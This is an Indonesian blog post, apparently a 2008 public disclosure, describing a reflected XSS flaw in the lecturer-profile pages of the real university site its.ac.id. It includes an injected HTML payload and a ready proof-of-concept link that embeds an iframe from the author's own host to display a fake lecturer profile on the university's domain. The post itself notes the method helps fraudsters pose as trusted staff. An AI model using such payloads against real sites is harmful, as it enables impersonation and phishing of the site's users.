ITS.AC.ID Vulnerable to XSS


  • SPYRO KiD
  • admin[~@t~]spyrozone[~d.t~]net
  • Saturday, July 19th, 2008
  • CopyLEFT (c) 2011++ www.spyrozone.net All Rights Reserved


Terdapat celah XSS serius pada situs Institut Teknologi Sepuluh Nopember (http://its.ac.id) yang dapat dimanfaatkan oleh pihak-pihak yang tidak bertanggungjawab untuk membuat informasi palsu atau membuat halaman login tipuan guna mencuri informasi sensitif user.

Jump to http://its.ac.id (ITS memiliki versi baru untuk websitenya dengan alamat http://www.its.ac.id (dengan www)). Klik link “Web Personal Dosen”. Anda akan dibawa menuju http://www.its.ac.id/personal/homebase.php, halaman yang berisi daftar nama-nama dosen ITS beserta link menuju data diri masing-masing Dosen.

{image: Web Personal Dosen ITS}

Web Personal Dosen ITS

Klik salah satu nama Dosen, maka akan tampil profil dosen tersebut.

{image: Vulnerable Area}

Vulnerable Area

Perhatikan, parameter ID melemparkan nilai berupa nama Dosen. Nilai tersebut ternyata tampil juga sebagai bagian dari link di halaman profil. Dengan demikian, ada kemungkinan celah XSS jika parameter tersebut tidak terfilter dengan baik. Saya uji coba memasukkan nilai berupa script sederhana pada parameter ID:

"></a><HR width="780"><CENTER><H1>XSSED<BR>BY<BR>HTTP://SPYROZONE.NET<NOSCRIPT>

Dan hasilnya adalah:

{image: XSSED by SPYROZONE.NET}

XSSED by SPYROZONE.NET

Hmm.. berhasil ;) tinggal menggali lebih dalam ajah, maka anda bisa membuat informasi palsu guna mencuri data sensitif user. Sebagai contoh, saya membuat profil Dosen tipuan di halaman tersebut:

{image: ITS.ac.id XSSED by SPYRO KiD}

ITS.ac.id XSSED by SPYRO KiD

POC:

<html>
<body><a href="http://www.its.ac.id/personal/index.php?id=spyro%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%22%3E%3C/a%3E%3Ciframe%20src=http://www.spyrozone.net/playground/dosenits.html%20width=%22780%22%20height=%22450%22%20scrolling=%22no%22%20border=%220%22%20frameborder=%220%22%3E%3Cnoscript%3E">Klik Disini</a>
</body>
</html>

Trik seperti ini sering dijadikan sebagai alat untuk meyakinkan korban bahwa si Penipu memiliki jabatan tertentu di suatu Instansi atau suatu perusahaan yang terpercaya ^_^

So, waspada selalu, keep learning and happy hacking!


//E.O.F